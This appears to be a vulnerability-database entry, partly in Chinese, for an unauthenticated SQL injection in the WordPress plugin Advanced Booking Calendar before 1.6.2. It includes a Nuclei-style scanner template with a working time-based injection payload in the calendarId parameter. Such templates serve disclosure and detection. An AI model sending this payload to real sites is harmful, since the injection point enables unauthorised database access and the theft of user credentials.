advanced-booking-calendar-sqli: Advanced Booking Calendar < 1.6.2 - SQL Injection

日期: 2025-08-01 | 影响软件: Advanced Booking Calendar | POC: 已公开

漏洞描述

The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.

PoC代码[已公开]

id: advanced-booking-calendar-sqli

info:
  name: Advanced Booking Calendar < 1.6.2 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.
  remediation: Fixed in version 1.6.2
  reference:
    - https://wpscan.com/vulnerability/bac7b590-70de-45b3-bdc2-19f90524ca39
    - https://wordpress.org/plugins/advanced-booking-calendar/
  metadata:
    verified: true
    max-request: 1
  tags: time-based-sqli,sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        calendarId=1)+AND+(SELECT+2065+FROM+(SELECT(SLEEP(6)))jtGw)+AND+(5440=5440&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "abc-result-header")'
        condition: and
# digest: 4b0a00483046022100ed5ad6652eef48186702843871778a4189e91c5c9106c083f72354329250c4450221009a871f7c4095ce533fd80e732a7eeb752c57f4fa2f172eda88fe246d13f3992e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐